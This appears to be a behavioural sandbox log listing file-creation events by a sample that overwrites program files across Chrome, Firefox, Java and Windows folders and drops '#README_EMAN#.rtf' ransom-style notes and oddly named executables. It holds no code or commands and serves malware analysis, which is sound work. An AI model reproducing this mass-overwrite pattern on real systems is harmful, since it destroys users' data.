| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\en-GB.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\en-US.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\id.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Genko_2.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\th-italia.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\desktop.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\he.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_LinkNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\pt-BR.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\el.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\elog_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Installer\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\es.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\hi.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\nb.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jsse.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\gmail.crx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\te.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\lv.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\de.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\gu.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Microsoft Office 15\ClientX64\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ml.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\plugin.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ru.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\server\classes.jsa | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\charsets.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\hu.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ca.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\bad_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\snapshot_blob.bin | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\fr.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\sv.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ko.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\lt.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\uk.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ms.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\sk.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\pt-PT.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\javaws.policy | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20170524140843.pma | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ro.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\fa.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\browser\features\webcompat@mozilla.org.xpi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\it.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\th.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\nacl_irt_x86_64.nexe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\vi.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\sr.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\nl.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\tr.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Uninstall Information\italian.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\blank.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\To_Do_List.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\default_apps\docs.crx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\VisualElements\logo.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\VisualElements\smalllogo.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\VisualElements\smalllogocanary.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_de.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\freebl3.chk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\VisualElements\logocanary.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\sw.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_TW.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\application.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\Accessible.tlb | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\precomplete | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\ar.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\jfxrt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\zh-TW.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\browser\VisualElements\VisualElements_70.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\natives_blob.bin | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\VisualElements\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\elog_460F9943EA70F103.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\november.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\browser\omni.ja | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\syria promptly.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\browser\VisualElements\VisualElements_150.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\browser\features\#README_EMAN#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\WidevineCdm\_platform_specific\win_x64\widevinecdmadapter.dll.sig | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\es-419.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\browser\features\aushelper@mozilla.org.xpi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}.xpi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\defaults\pref\channel-prefs.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\omni.ja | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\dependentlibs.list | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\softokn3.chk | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\platform.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\hr.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Windows Mail\wabmig.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Oracle\Java\javapath\java.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\browser\features\e10srollout@mozilla.org.xpi | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\updater.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\uninstall\shortcuts_log.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\firefox.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Maintenance Service\updater.ini | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\mr.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\sl.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\Locales\zh-CN.pak | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Mozilla Firefox\voucher.bin | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Package Cache\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\packages\vcRuntimeMinimum_x86\cab1.cab | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Adobe\ARM\Reader_17.012.20098\AcroRdrDCUpd1800920044_incr.msp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Google\Chrome\Application\58.0.3029.110\WidevineCdm\manifest.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\ProgramData\Oracle\Java\javapath_target_5923062\javaw.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
